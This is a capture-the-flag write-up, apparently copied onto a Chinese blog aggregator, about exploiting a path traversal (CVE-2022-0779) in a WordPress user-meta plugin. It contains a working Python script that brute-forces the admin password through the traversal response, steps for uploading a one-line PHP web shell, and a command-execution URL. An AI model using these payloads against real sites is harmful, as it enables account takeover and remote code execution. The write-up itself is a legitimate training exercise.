当前位置:网站首页>[Strong Net Cup 2022] WP-UM
[Strong Net Cup 2022] WP-UM
2022-08-05 10:03:00 【Landasika】
Test site: WordPress User Meta Lite Pro 2.4.3 Path Traversal Vulnerability CVE-2022-0779
Initialize questions first

Get administrator account password
Register a user

Login user

Capture the uploaded data package

Then send, intercept a packet with action=um_show_uploaded_file

According to the home page information, you can get the administrator's username

Using the CVE-2022-0779 Path traversal vulnerability, if this file exists, then Remove will be displayed, if there is no such file, there will be no Remove


Blast the password
import requestslis='qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'password=''url="http://ip:port/wp-admin/admin-ajax.php"header={'Host': 'ip:port','X-Requested-With': 'XMLHttpRequest','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36','Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','Origin': 'http://ip:port','Referer': 'http://ip:port/index.php/upload/','Cookie':'wordpress_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C773b42bf40849a9d6365ec60b43eb256204f1c41a3c52103702ac0ea8b910a85; wordpress_logged_in_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C46c1c28f20badcb553d1aef7f4ee2f926b5a6b9cb83e0f934a230f38d30a88cc'}for i in range (1,16):for s in lis:datas="field_name=upload&filepath=/../../../../../../../password/"+str(i)+s+"&field_id=um_field_2&form_key=upload&action=um_show_uploaded_file&pf_nonce=8a8f9c780f&is_ajax=true"result=requests.post(url,data=datas,headers=header)if 'Remove' in result.text:password+=sbreakprint(password)
Upload a Trojan horse
Modify upload file settings


Then enter the page to update

Upload a sentence Trojan

Get flag
Go to wp-content/uploads/file/2.php
wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);oads/file/2.php
wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);
边栏推荐
- What is the function of the regular expression replaceFirst() method?
- 为什么sys_class 里显示的很多表的 RELTABLESPACE 值为 0 ?
- JS逆向入门学习之回收商网,手机号码简易加密解析
- EU | Horizon 2020 ENSEMBLE: D2.13 SOTIF Safety Concept (Part 2)
- After Keil upgrades to AC6, what changes?
- MySQL data view
- 告白数字化转型时代:麦聪软件以最简单的方式让企业把数据用起来
- 2022/8/4 考试总结
- 基于MindSpore高效完成图像分割,实现Dice!
- shell脚本实例
猜你喜欢

微服务 技术栈

CCVR eases heterogeneous federated learning based on classifier calibration

首次去中心化抢劫?近2亿美元损失:跨链桥Nomad 被攻击事件分析

电竞、便捷、高效、安全,盘点OriginOS功能的关键词

DFINITY 基金会创始人谈熊市沉浮,DeFi 项目该何去何从

19. Server-side session technology Session

mysql索引

【MindSpore Easy-Diantong Robot-01】You may have seen many knowledge quiz robots, but this one is a bit different

mysql进阶(二十七)数据库索引原理

百年北欧奢华家电品牌ASKO智能三温区酒柜臻献七夕,共品珍馐爱意
随机推荐
Complete image segmentation efficiently based on MindSpore and realize Dice!
为什么sys_class 里显示的很多表的 RELTABLESPACE 值为 0 ?
NowCoderTOP35-40——持续更新ing
PAT Grade B-B1020 Mooncake(25)
静态链接和动态链接
华为轻量级神经网络架构GhostNet再升级,GPU上大显身手的G-GhostNet(IJCV22)
The difference between find, matches, lookingAt matching strings in matcher
无题十
数据中台建设(十):数据安全管理
无题五
Microservice Technology Stack
歌词整理
Redis源码解析:Redis Cluster
韦东山 数码相框 项目学习(六)tslib的移植
three.js debugging tool dat.gui use
上海控安技术成果入选市经信委《2021年上海市网络安全产业创新攻关成果目录》
Four years of weight loss record
leetcode: 529. 扫雷游戏
STM32+ULN2003驱动28BYJ4步进电机(根据圈数正转、反转)
Egg framework usage (1)